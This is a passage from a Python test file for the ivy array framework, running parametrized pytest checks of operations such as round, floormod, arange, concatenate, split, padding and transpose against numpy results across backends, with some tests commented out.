# assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# # compilation test
# if call is helpers.torch_call:
# # pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
# return
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# argmax
# @pytest.mark.parametrize(
# "x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
# ([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# # smoke test
# x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
# axis = x_n_axis_x_argmax[1]
# ret = ivy.argmax(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (len(x.shape),)
# # value test
# assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# argsort
# @pytest.mark.parametrize(
# "x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# # smoke test
# x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
# axis = x_n_axis_x_argsort[1]
# ret = ivy.argsort(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (6,)
# # value test
# assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
# flip
# @pytest.mark.parametrize(
# "x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
# ([[[-0.1471, 0.4477, 0.2214]]], None, None)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis, bs = x_n_axis_n_bs
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.flip(x, axis, bs)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# stack
# @pytest.mark.parametrize(
# "xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# (x1, x2), axis = xs_n_axis
# if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x1 = tensor_fn(x1, dtype, dev)
# x2 = tensor_fn(x2, dtype, dev)
# ret = ivy.stack((x1, x2), axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
# if x1.shape == ():
# expected_shape = (2,)
# else:
# expected_shape = list(x1.shape)
# expected_shape.insert(axis_val, 2)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.stack, (x1, x2), axis),
# np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# tile
# @pytest.mark.parametrize(
# "x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# # smoke test
# x, reps_raw = x_n_reps
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret_from_list = ivy.tile(x, reps_raw)
# reps = ivy.array(reps_raw, 'int32', dev)
# ret = ivy.tile(x, reps)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if x.shape == ():
# expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
# else:
# expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
# assert ret.shape == expected_shape
# # value test
# assert np.allclose(call(ivy.tile, x, reps),
# np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# fourier_encode
# @pytest.mark.parametrize(
# "x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
# 3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
# ([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
# [[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
# -8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
# -6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
# 1.0000000e+00]],
# [[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
# -2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
# -1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
# 1.0000000e+00]],
# [[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
# -6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
# -3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
# 1.0000000e+00]]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# # smoke test
# x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# if isinstance(max_freq, list):
# max_freq = tensor_fn(max_freq, dtype, dev)
# ret = ivy.fourier_encode(x, max_freq, num_bands)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# x_shape = [1] if x.shape == () else list(x.shape)
# expected_shape = x_shape + [1 + 2*num_bands]
# assert list(ret.shape) == expected_shape
# # value test
# assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# expand_dims
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.expand_dims(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# expected_shape = list(x.shape)
# expected_shape.insert(axis, 1)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
